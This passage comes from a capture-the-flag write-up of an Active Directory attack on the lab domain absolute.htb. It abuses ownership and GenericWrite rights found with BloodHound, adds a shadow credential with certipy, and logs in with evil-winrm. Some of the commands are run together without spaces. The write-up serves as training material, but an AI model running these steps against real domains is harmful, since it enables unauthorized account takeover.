Get a Bloodhound result below. The m.lovegod owns the Network Audit group, which has GenericWrite on the winrm_user user.
To get access to the machine, I’ll first I’ll need to give m.lovegod write access on the Network Audit group. Then I can add m.lovegod to the group. Finally, I can use those permissions to create a shadow credential for the winrm_user account to access to the machine via evil_winrm.
Update the ownership of the user to add a 'write permission'.
# Let's find ADCS environment. You will see some ADCS configurations. KRB5CCNAME=./d.klay.ccachecertipyfind-usernamem.lovegod@absolute.htb-k-targetdc.absolute.htb# Let's add the shadow credential to the winrm_user user KRB5CCNAME=./d.klay.ccache certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
# Let's connect to the machineKRB5CCNAME=./winrm_user.ccacheevil-winrm-idc.absolute.htb-rabsolute.htb